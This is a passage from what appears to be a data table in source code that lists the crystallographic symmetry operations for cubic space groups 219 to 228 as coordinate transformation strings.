'-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y,x+1/2,z', '-y,-x+1/2,z', 'y,-x+1/2,-z',
'-y,x+1/2,-z', 'x,z+1/2,y', '-x,z+1/2,-y', '-x,-z+1/2,y', 'x,-z+1/2,-y', 'z,y+1/2,x', 'z,-y+1/2,-x',
'-z,y+1/2,-x', '-z,-y+1/2,x', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z',
'z+1/2,x+1/2,y', 'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x',
'-y+1/2,z+1/2,-x', 'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y,x,z+1/2', '-y,-x,z+1/2', 'y,-x,-z+1/2',
'-y,x,-z+1/2', 'x,z,y+1/2', '-x,z,-y+1/2', '-x,-z,y+1/2', 'x,-z,-y+1/2', 'z,y,x+1/2', 'z,-y,-x+1/2',
'-z,y,-x+1/2', '-z,-y,x+1/2'],
220: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+1/4,x+1/4,z+1/4', '-y+1/4,-x+3/4,z+3/4', 'y+3/4,-x+1/4,-z+3/4', '-y+3/4,x+3/4,-z+1/4',
'x+1/4,z+1/4,y+1/4', '-x+3/4,z+3/4,-y+1/4', '-x+1/4,-z+3/4,y+3/4', 'x+3/4,-z+1/4,-y+3/4',
'z+1/4,y+1/4,x+1/4', 'z+3/4,-y+1/4,-x+3/4', '-z+3/4,y+3/4,-x+1/4', '-z+1/4,-y+3/4,x+3/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x',
'y+3/4,x+3/4,z+3/4', '-y+3/4,-x+1/4,z+1/4', 'y+1/4,-x+3/4,-z+1/4', '-y+1/4,x+1/4,-z+3/4',
'x+3/4,z+3/4,y+3/4', '-x+1/4,z+1/4,-y+3/4', '-x+3/4,-z+1/4,y+1/4', 'x+1/4,-z+3/4,-y+1/4',
'z+3/4,y+3/4,x+3/4', 'z+1/4,-y+3/4,-x+1/4', '-z+1/4,y+1/4,-x+3/4', '-z+3/4,-y+1/4,x+1/4'],
221: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y',
'z,x,-y', 'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y,-x,z', 'y,x,z', '-y,x,-z', 'y,-x,-z',
'-x,-z,y', 'x,-z,-y', 'x,z,y', '-x,z,-y', '-z,-y,x', '-z,y,-x', 'z,-y,-x', 'z,y,x'],
222: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2', 'z,x,y', 'z,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y', '-z+1/2,x,-y+1/2', 'y,z,x', '-y+1/2,z,-x+1/2', 'y,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x',
'y,x,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', 'y,-x+1/2,z', '-y+1/2,x,z', 'x,z,-y+1/2', '-x+1/2,z,y',
'-x+1/2,-z+1/2,-y+1/2', 'x,-z+1/2,y', 'z,y,-x+1/2', 'z,-y+1/2,x', '-z+1/2,y,x', '-z+1/2,-y+1/2,-x+1/2',
'-x,-y,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-z,-x,-y', '-z,x+1/2,y+1/2',
'z+1/2,x+1/2,-y', 'z+1/2,-x,y+1/2', '-y,-z,-x', 'y+1/2,-z,x+1/2', '-y,z+1/2,x+1/2', 'y+1/2,z+1/2,-x',
'-y,-x,z+1/2', 'y+1/2,x+1/2,z+1/2', '-y,x+1/2,-z', 'y+1/2,-x,-z', '-x,-z,y+1/2', 'x+1/2,-z,-y',
'x+1/2,z+1/2,y+1/2', '-x,z+1/2,-y', '-z,-y,x+1/2', '-z,y+1/2,-x', 'z+1/2,-y,-x', 'z+1/2,y+1/2,x+1/2'],
223: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', 'y+1/2,-x+1/2,z+1/2',
'-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2', '-x+1/2,z+1/2,y+1/2', '-x+1/2,-z+1/2,-y+1/2',
'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,x+1/2',
'-z+1/2,-y+1/2,-x+1/2', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y',
'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-x+1/2,-z+1/2,y+1/2', 'x+1/2,-z+1/2,-y+1/2',
'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,-x+1/2',
'z+1/2,-y+1/2,-x+1/2', 'z+1/2,y+1/2,x+1/2'],
224: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2', 'z,x,y', 'z,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y', '-z+1/2,x,-y+1/2', 'y,z,x', '-y+1/2,z,-x+1/2', 'y,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x',
'y+1/2,x+1/2,-z', '-y,-x,-z', 'y+1/2,-x,z+1/2', '-y,x+1/2,z+1/2', 'x+1/2,z+1/2,-y', '-x,z+1/2,y+1/2',
'-x,-z,-y', 'x+1/2,-z,y+1/2', 'z+1/2,y+1/2,-x', 'z+1/2,-y,x+1/2', '-z,y+1/2,x+1/2', '-z,-y,-x',
'-x,-y,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-z,-x,-y', '-z,x+1/2,y+1/2',
'z+1/2,x+1/2,-y', 'z+1/2,-x,y+1/2', '-y,-z,-x', 'y+1/2,-z,x+1/2', '-y,z+1/2,x+1/2', 'y+1/2,z+1/2,-x',
'-y+1/2,-x+1/2,z', 'y,x,z', '-y+1/2,x,-z+1/2', 'y,-x+1/2,-z+1/2', '-x+1/2,-z+1/2,y', 'x,-z+1/2,-y+1/2',
'x,z,y', '-x+1/2,z,-y+1/2', '-z+1/2,-y+1/2,x', '-z+1/2,y,-x+1/2', 'z,-y+1/2,-x+1/2', 'z,y,x'],
225: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y',
'z,x,-y', 'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y,-x,z', 'y,x,z', '-y,x,-z', 'y,-x,-z',
'-x,-z,y', 'x,-z,-y', 'x,z,y', '-x,z,-y', '-z,-y,x', '-z,y,-x', 'z,-y,-x', 'z,y,x', 'x,y+1/2,z+1/2',
'-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2',
'-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2', 'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2',
'-y,-z+1/2,x+1/2', 'y,x+1/2,-z+1/2', '-y,-x+1/2,-z+1/2', 'y,-x+1/2,z+1/2', '-y,x+1/2,z+1/2',
'x,z+1/2,-y+1/2', '-x,z+1/2,y+1/2', '-x,-z+1/2,-y+1/2', 'x,-z+1/2,y+1/2', 'z,y+1/2,-x+1/2',
'z,-y+1/2,x+1/2', '-z,y+1/2,x+1/2', '-z,-y+1/2,-x+1/2', '-x,-y+1/2,-z+1/2', 'x,y+1/2,-z+1/2',
'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2', '-z,-x+1/2,-y+1/2', '-z,x+1/2,y+1/2', 'z,x+1/2,-y+1/2',
'z,-x+1/2,y+1/2', '-y,-z+1/2,-x+1/2', 'y,-z+1/2,x+1/2', '-y,z+1/2,x+1/2', 'y,z+1/2,-x+1/2',
'-y,-x+1/2,z+1/2', 'y,x+1/2,z+1/2', '-y,x+1/2,-z+1/2', 'y,-x+1/2,-z+1/2', '-x,-z+1/2,y+1/2',
'x,-z+1/2,-y+1/2', 'x,z+1/2,y+1/2', '-x,z+1/2,-y+1/2', '-z,-y+1/2,x+1/2', '-z,y+1/2,-x+1/2',
'z,-y+1/2,-x+1/2', 'z,y+1/2,x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2',
'x+1/2,-y,-z+1/2', 'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2',
'y+1/2,z,x+1/2', '-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y+1/2,x,-z+1/2',
'-y+1/2,-x,-z+1/2', 'y+1/2,-x,z+1/2', '-y+1/2,x,z+1/2', 'x+1/2,z,-y+1/2', '-x+1/2,z,y+1/2',
'-x+1/2,-z,-y+1/2', 'x+1/2,-z,y+1/2', 'z+1/2,y,-x+1/2', 'z+1/2,-y,x+1/2', '-z+1/2,y,x+1/2',
'-z+1/2,-y,-x+1/2', '-x+1/2,-y,-z+1/2', 'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2',
'-z+1/2,-x,-y+1/2', '-z+1/2,x,y+1/2', 'z+1/2,x,-y+1/2', 'z+1/2,-x,y+1/2', '-y+1/2,-z,-x+1/2',
'y+1/2,-z,x+1/2', '-y+1/2,z,x+1/2', 'y+1/2,z,-x+1/2', '-y+1/2,-x,z+1/2', 'y+1/2,x,z+1/2',
'-y+1/2,x,-z+1/2', 'y+1/2,-x,-z+1/2', '-x+1/2,-z,y+1/2', 'x+1/2,-z,-y+1/2', 'x+1/2,z,y+1/2',
'-x+1/2,z,-y+1/2', '-z+1/2,-y,x+1/2', '-z+1/2,y,-x+1/2', 'z+1/2,-y,-x+1/2', 'z+1/2,y,x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y+1/2,x+1/2,-z', '-y+1/2,-x+1/2,-z', 'y+1/2,-x+1/2,z',
'-y+1/2,x+1/2,z', 'x+1/2,z+1/2,-y', '-x+1/2,z+1/2,y', '-x+1/2,-z+1/2,-y', 'x+1/2,-z+1/2,y',
'z+1/2,y+1/2,-x', 'z+1/2,-y+1/2,x', '-z+1/2,y+1/2,x', '-z+1/2,-y+1/2,-x', '-x+1/2,-y+1/2,-z',
'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', '-z+1/2,-x+1/2,-y', '-z+1/2,x+1/2,y',
'z+1/2,x+1/2,-y', 'z+1/2,-x+1/2,y', '-y+1/2,-z+1/2,-x', 'y+1/2,-z+1/2,x', '-y+1/2,z+1/2,x',
'y+1/2,z+1/2,-x', '-y+1/2,-x+1/2,z', 'y+1/2,x+1/2,z', '-y+1/2,x+1/2,-z', 'y+1/2,-x+1/2,-z',
'-x+1/2,-z+1/2,y', 'x+1/2,-z+1/2,-y', 'x+1/2,z+1/2,y', '-x+1/2,z+1/2,-y', '-z+1/2,-y+1/2,x',
'-z+1/2,y+1/2,-x', 'z+1/2,-y+1/2,-x', 'z+1/2,y+1/2,x'],
226: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', 'y+1/2,-x+1/2,z+1/2',
'-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2', '-x+1/2,z+1/2,y+1/2', '-x+1/2,-z+1/2,-y+1/2',
'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,x+1/2',
'-z+1/2,-y+1/2,-x+1/2', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y',
'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-x+1/2,-z+1/2,y+1/2', 'x+1/2,-z+1/2,-y+1/2',
'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,-x+1/2',
'z+1/2,-y+1/2,-x+1/2', 'z+1/2,y+1/2,x+1/2', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2',
'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'y+1/2,x,-z', '-y+1/2,-x,-z',
'y+1/2,-x,z', '-y+1/2,x,z', 'x+1/2,z,-y', '-x+1/2,z,y', '-x+1/2,-z,-y', 'x+1/2,-z,y', 'z+1/2,y,-x',
'z+1/2,-y,x', '-z+1/2,y,x', '-z+1/2,-y,-x', '-x,-y+1/2,-z+1/2', 'x,y+1/2,-z+1/2', 'x,-y+1/2,z+1/2',
'-x,y+1/2,z+1/2', '-z,-x+1/2,-y+1/2', '-z,x+1/2,y+1/2', 'z,x+1/2,-y+1/2', 'z,-x+1/2,y+1/2',
'-y,-z+1/2,-x+1/2', 'y,-z+1/2,x+1/2', '-y,z+1/2,x+1/2', 'y,z+1/2,-x+1/2', '-y+1/2,-x,z', 'y+1/2,x,z',
'-y+1/2,x,-z', 'y+1/2,-x,-z', '-x+1/2,-z,y', 'x+1/2,-z,-y', 'x+1/2,z,y', '-x+1/2,z,-y', '-z+1/2,-y,x',
'-z+1/2,y,-x', 'z+1/2,-y,-x', 'z+1/2,y,x', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2',
'x+1/2,-y,-z+1/2', 'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2',
'y+1/2,z,x+1/2', '-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y,x+1/2,-z', '-y,-x+1/2,-z',
'y,-x+1/2,z', '-y,x+1/2,z', 'x,z+1/2,-y', '-x,z+1/2,y', '-x,-z+1/2,-y', 'x,-z+1/2,y', 'z,y+1/2,-x',
'z,-y+1/2,x', '-z,y+1/2,x', '-z,-y+1/2,-x', '-x+1/2,-y,-z+1/2', 'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2',
'-x+1/2,y,z+1/2', '-z+1/2,-x,-y+1/2', '-z+1/2,x,y+1/2', 'z+1/2,x,-y+1/2', 'z+1/2,-x,y+1/2',
'-y+1/2,-z,-x+1/2', 'y+1/2,-z,x+1/2', '-y+1/2,z,x+1/2', 'y+1/2,z,-x+1/2', '-y,-x+1/2,z', 'y,x+1/2,z',
'-y,x+1/2,-z', 'y,-x+1/2,-z', '-x,-z+1/2,y', 'x,-z+1/2,-y', 'x,z+1/2,y', '-x,z+1/2,-y', '-z,-y+1/2,x',
'-z,y+1/2,-x', 'z,-y+1/2,-x', 'z,y+1/2,x', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z',
'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y', 'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y',
'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x', 'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'y,-x,z+1/2', '-y,x,z+1/2', 'x,z,-y+1/2', '-x,z,y+1/2', '-x,-z,-y+1/2', 'x,-z,y+1/2', 'z,y,-x+1/2',
'z,-y,x+1/2', '-z,y,x+1/2', '-z,-y,-x+1/2', '-x+1/2,-y+1/2,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z', '-z+1/2,-x+1/2,-y', '-z+1/2,x+1/2,y', 'z+1/2,x+1/2,-y', 'z+1/2,-x+1/2,y',
'-y+1/2,-z+1/2,-x', 'y+1/2,-z+1/2,x', '-y+1/2,z+1/2,x', 'y+1/2,z+1/2,-x', '-y,-x,z+1/2', 'y,x,z+1/2',
'-y,x,-z+1/2', 'y,-x,-z+1/2', '-x,-z,y+1/2', 'x,-z,-y+1/2', 'x,z,y+1/2', '-x,z,-y+1/2', '-z,-y,x+1/2',
'-z,y,-x+1/2', 'z,-y,-x+1/2', 'z,y,x+1/2'],
227: ['x,y,z', '-x+3/4,-y+1/4,z+1/2', '-x+1/4,y+1/2,-z+3/4', 'x+1/2,-y+3/4,-z+1/4', 'z,x,y',
'z+1/2,-x+3/4,-y+1/4', '-z+3/4,-x+1/4,y+1/2', '-z+1/4,x+1/2,-y+3/4', 'y,z,x', '-y+1/4,z+1/2,-x+3/4',
'y+1/2,-z+3/4,-x+1/4', '-y+3/4,-z+1/4,x+1/2', 'y+3/4,x+1/4,-z+1/2', '-y,-x,-z', 'y+1/4,-x+1/2,z+3/4',
'-y+1/2,x+3/4,z+1/4', 'x+3/4,z+1/4,-y+1/2', '-x+1/2,z+3/4,y+1/4', '-x,-z,-y', 'x+1/4,-z+1/2,y+3/4',
'z+3/4,y+1/4,-x+1/2', 'z+1/4,-y+1/2,x+3/4', '-z+1/2,y+3/4,x+1/4', '-z,-y,-x', '-x,-y,-z',
'x+1/4,y+3/4,-z+1/2', 'x+3/4,-y+1/2,z+1/4', '-x+1/2,y+1/4,z+3/4', '-z,-x,-y', '-z+1/2,x+1/4,y+3/4',
'z+1/4,x+3/4,-y+1/2', 'z+3/4,-x+1/2,y+1/4', '-y,-z,-x', 'y+3/4,-z+1/2,x+1/4', '-y+1/2,z+1/4,x+3/4',
'y+1/4,z+3/4,-x+1/2', '-y+1/4,-x+3/4,z+1/2', 'y,x,z', '-y+3/4,x+1/2,-z+1/4', 'y+1/2,-x+1/4,-z+3/4',
'-x+1/4,-z+3/4,y+1/2', 'x+1/2,-z+1/4,-y+3/4', 'x,z,y', '-x+3/4,z+1/2,-y+1/4', '-z+1/4,-y+3/4,x+1/2',
'-z+3/4,y+1/2,-x+1/4', 'z+1/2,-y+1/4,-x+3/4', 'z,y,x', 'x,y+1/2,z+1/2', '-x+3/4,-y+3/4,z',
'-x+1/4,y,-z+1/4', 'x+1/2,-y+1/4,-z+3/4', 'z,x+1/2,y+1/2', 'z+1/2,-x+1/4,-y+3/4', '-z+3/4,-x+3/4,y',
'-z+1/4,x,-y+1/4', 'y,z+1/2,x+1/2', '-y+1/4,z,-x+1/4', 'y+1/2,-z+1/4,-x+3/4', '-y+3/4,-z+3/4,x',
'y+3/4,x+3/4,-z', '-y,-x+1/2,-z+1/2', 'y+1/4,-x,z+1/4', '-y+1/2,x+1/4,z+3/4', 'x+3/4,z+3/4,-y',
'-x+1/2,z+1/4,y+3/4', '-x,-z+1/2,-y+1/2', 'x+1/4,-z,y+1/4', 'z+3/4,y+3/4,-x', 'z+1/4,-y,x+1/4',
'-z+1/2,y+1/4,x+3/4', '-z,-y+1/2,-x+1/2', '-x,-y+1/2,-z+1/2', 'x+1/4,y+1/4,-z', 'x+3/4,-y,z+3/4',
'-x+1/2,y+3/4,z+1/4', '-z,-x+1/2,-y+1/2', '-z+1/2,x+3/4,y+1/4', 'z+1/4,x+1/4,-y', 'z+3/4,-x,y+3/4',
'-y,-z+1/2,-x+1/2', 'y+3/4,-z,x+3/4', '-y+1/2,z+3/4,x+1/4', 'y+1/4,z+1/4,-x', '-y+1/4,-x+1/4,z',
'y,x+1/2,z+1/2', '-y+3/4,x,-z+3/4', 'y+1/2,-x+3/4,-z+1/4', '-x+1/4,-z+1/4,y', 'x+1/2,-z+3/4,-y+1/4',
'x,z+1/2,y+1/2', '-x+3/4,z,-y+3/4', '-z+1/4,-y+1/4,x', '-z+3/4,y,-x+3/4', 'z+1/2,-y+3/4,-x+1/4',
'z,y+1/2,x+1/2', 'x+1/2,y,z+1/2', '-x+1/4,-y+1/4,z', '-x+3/4,y+1/2,-z+1/4', 'x,-y+3/4,-z+3/4',
'z+1/2,x,y+1/2', 'z,-x+3/4,-y+3/4', '-z+1/4,-x+1/4,y', '-z+3/4,x+1/2,-y+1/4', 'y+1/2,z,x+1/2',
'-y+3/4,z+1/2,-x+1/4', 'y,-z+3/4,-x+3/4', '-y+1/4,-z+1/4,x', 'y+1/4,x+1/4,-z', '-y+1/2,-x,-z+1/2',
'y+3/4,-x+1/2,z+1/4', '-y,x+3/4,z+3/4', 'x+1/4,z+1/4,-y', '-x,z+3/4,y+3/4', '-x+1/2,-z,-y+1/2',
'x+3/4,-z+1/2,y+1/4', 'z+1/4,y+1/4,-x', 'z+3/4,-y+1/2,x+1/4', '-z,y+3/4,x+3/4', '-z+1/2,-y,-x+1/2',
'-x+1/2,-y,-z+1/2', 'x+3/4,y+3/4,-z', 'x+1/4,-y+1/2,z+3/4', '-x,y+1/4,z+1/4', '-z+1/2,-x,-y+1/2',
'-z,x+1/4,y+1/4', 'z+3/4,x+3/4,-y', 'z+1/4,-x+1/2,y+3/4', '-y+1/2,-z,-x+1/2', 'y+1/4,-z+1/2,x+3/4',
'-y,z+1/4,x+1/4', 'y+3/4,z+3/4,-x', '-y+3/4,-x+3/4,z', 'y+1/2,x,z+1/2', '-y+1/4,x+1/2,-z+3/4',
'y,-x+1/4,-z+1/4', '-x+3/4,-z+3/4,y', 'x,-z+1/4,-y+1/4', 'x+1/2,z,y+1/2', '-x+1/4,z+1/2,-y+3/4',
'-z+3/4,-y+3/4,x', '-z+1/4,y+1/2,-x+3/4', 'z,-y+1/4,-x+1/4', 'z+1/2,y,x+1/2', 'x+1/2,y+1/2,z',
'-x+1/4,-y+3/4,z+1/2', '-x+3/4,y,-z+3/4', 'x,-y+1/4,-z+1/4', 'z+1/2,x+1/2,y', 'z,-x+1/4,-y+1/4',
'-z+1/4,-x+3/4,y+1/2', '-z+3/4,x,-y+3/4', 'y+1/2,z+1/2,x', '-y+3/4,z,-x+3/4', 'y,-z+1/4,-x+1/4',
'-y+1/4,-z+3/4,x+1/2', 'y+1/4,x+3/4,-z+1/2', '-y+1/2,-x+1/2,-z', 'y+3/4,-x,z+3/4', '-y,x+1/4,z+1/4',
'x+1/4,z+3/4,-y+1/2', '-x,z+1/4,y+1/4', '-x+1/2,-z+1/2,-y', 'x+3/4,-z,y+3/4', 'z+1/4,y+3/4,-x+1/2',
'z+3/4,-y,x+3/4', '-z,y+1/4,x+1/4', '-z+1/2,-y+1/2,-x', '-x+1/2,-y+1/2,-z', 'x+3/4,y+1/4,-z+1/2',
'x+1/4,-y,z+1/4', '-x,y+3/4,z+3/4', '-z+1/2,-x+1/2,-y', '-z,x+3/4,y+3/4', 'z+3/4,x+1/4,-y+1/2',
'z+1/4,-x,y+1/4', '-y+1/2,-z+1/2,-x', 'y+1/4,-z,x+1/4', '-y,z+3/4,x+3/4', 'y+3/4,z+1/4,-x+1/2',
'-y+3/4,-x+1/4,z+1/2', 'y+1/2,x+1/2,z', '-y+1/4,x,-z+1/4', 'y,-x+3/4,-z+3/4', '-x+3/4,-z+1/4,y+1/2',
'x,-z+3/4,-y+3/4', 'x+1/2,z+1/2,y', '-x+1/4,z,-y+1/4', '-z+3/4,-y+1/4,x+1/2', '-z+1/4,y,-x+1/4',
'z,-y+3/4,-x+3/4', 'z+1/2,y+1/2,x'],
228: ['x,y,z', '-x+1/4,-y+3/4,z+1/2', '-x+3/4,y+1/2,-z+1/4', 'x+1/2,-y+1/4,-z+3/4', 'z,x,y',
'z+1/2,-x+1/4,-y+3/4', '-z+1/4,-x+3/4,y+1/2', '-z+3/4,x+1/2,-y+1/4', 'y,z,x', '-y+3/4,z+1/2,-x+1/4',
'y+1/2,-z+1/4,-x+3/4', '-y+1/4,-z+3/4,x+1/2', 'y+3/4,x+1/4,-z', '-y+1/2,-x+1/2,-z+1/2', 'y+1/4,-x,z+3/4',
'-y,x+3/4,z+1/4', 'x+3/4,z+1/4,-y', '-x,z+3/4,y+1/4', '-x+1/2,-z+1/2,-y+1/2', 'x+1/4,-z,y+3/4',
'z+3/4,y+1/4,-x', 'z+1/4,-y,x+3/4', '-z,y+3/4,x+1/4', '-z+1/2,-y+1/2,-x+1/2', '-x,-y,-z',
'x+3/4,y+1/4,-z+1/2', 'x+1/4,-y+1/2,z+3/4', '-x+1/2,y+3/4,z+1/4', '-z,-x,-y', '-z+1/2,x+3/4,y+1/4',
'z+3/4,x+1/4,-y+1/2', 'z+1/4,-x+1/2,y+3/4', '-y,-z,-x', 'y+1/4,-z+1/2,x+3/4', '-y+1/2,z+3/4,x+1/4',
'y+3/4,z+1/4,-x+1/2', '-y+1/4,-x+3/4,z', 'y+1/2,x+1/2,z+1/2', '-y+3/4,x,-z+1/4', 'y,-x+1/4,-z+3/4',
'-x+1/4,-z+3/4,y', 'x,-z+1/4,-y+3/4', 'x+1/2,z+1/2,y+1/2', '-x+3/4,z,-y+1/4', '-z+1/4,-y+3/4,x',
'-z+3/4,y,-x+1/4', 'z,-y+1/4,-x+3/4', 'z+1/2,y+1/2,x+1/2', 'x,y+1/2,z+1/2', '-x+1/4,-y+1/4,z',
'-x+3/4,y,-z+3/4', 'x+1/2,-y+3/4,-z+1/4', 'z,x+1/2,y+1/2', 'z+1/2,-x+3/4,-y+1/4', '-z+1/4,-x+1/4,y',
'-z+3/4,x,-y+3/4', 'y,z+1/2,x+1/2', '-y+3/4,z,-x+3/4', 'y+1/2,-z+3/4,-x+1/4', '-y+1/4,-z+1/4,x',
'y+3/4,x+3/4,-z+1/2', '-y+1/2,-x,-z', 'y+1/4,-x+1/2,z+1/4', '-y,x+1/4,z+3/4', 'x+3/4,z+3/4,-y+1/2',
'-x,z+1/4,y+3/4', '-x+1/2,-z,-y', 'x+1/4,-z+1/2,y+1/4', 'z+3/4,y+3/4,-x+1/2', 'z+1/4,-y+1/2,x+1/4',
'-z,y+1/4,x+3/4', '-z+1/2,-y,-x', '-x,-y+1/2,-z+1/2', 'x+3/4,y+3/4,-z', 'x+1/4,-y,z+1/4',
'-x+1/2,y+1/4,z+3/4', '-z,-x+1/2,-y+1/2', '-z+1/2,x+1/4,y+3/4', 'z+3/4,x+3/4,-y', 'z+1/4,-x,y+1/4',
'-y,-z+1/2,-x+1/2', 'y+1/4,-z,x+1/4', '-y+1/2,z+1/4,x+3/4', 'y+3/4,z+3/4,-x', '-y+1/4,-x+1/4,z+1/2',
'y+1/2,x,z', '-y+3/4,x+1/2,-z+3/4', 'y,-x+3/4,-z+1/4', '-x+1/4,-z+1/4,y+1/2', 'x,-z+3/4,-y+1/4',
